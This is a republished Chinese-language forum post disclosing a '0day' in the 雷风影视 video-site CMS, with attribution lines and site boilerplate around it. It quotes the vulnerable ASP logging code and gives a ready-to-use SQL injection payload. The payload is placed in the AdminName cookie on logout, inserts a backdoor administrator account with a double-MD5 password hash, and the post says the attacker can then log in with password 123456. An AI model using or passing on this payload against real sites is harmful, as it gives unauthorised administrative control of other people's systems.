雷风影视系统0day -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【meiwen.anslib.com - 电脑资料】

    龙影

    发布时间:2009-11-9

    针对SQL和未改后台地址版本

    漏洞描述:admin/inc/.asp 124行

    引用

    conn.execute("INSERT INTO "&web_dbtop&"log (logcontent,logtime,logname,logip) VALUES ('"&logcontent&"','"&logtime&"','"&Request.s(web_url)("AdminName")&"','"&usersip()&"')")

    这里的web_url是当前网站地址

    这个在admin_login.asp?action=logout的时候调用了一次

    admin_login.asp 164行call addlog("退出登陆")

    所以在提交admin_login.asp?action=logout请求时,更改你的AdminName的就可以进行多语句执行注入了,

雷风影视系统0day

电脑资料

雷风影视系统0day》(http://meiwen.anslib.com)。

    例如把值更改为:web_url=AdminName=a','127.0.0.1');insert into lf_admin ([name],[password])values('yglh','14e1b600b1fd579f47433b88e8d85291')--;

    然后就可以用yglh和密码为123456的登录了。

    PS:他们的MD5值是经过两次MD5的。所以是14e1b600b1fd579f47433b88e8d85291

最新文章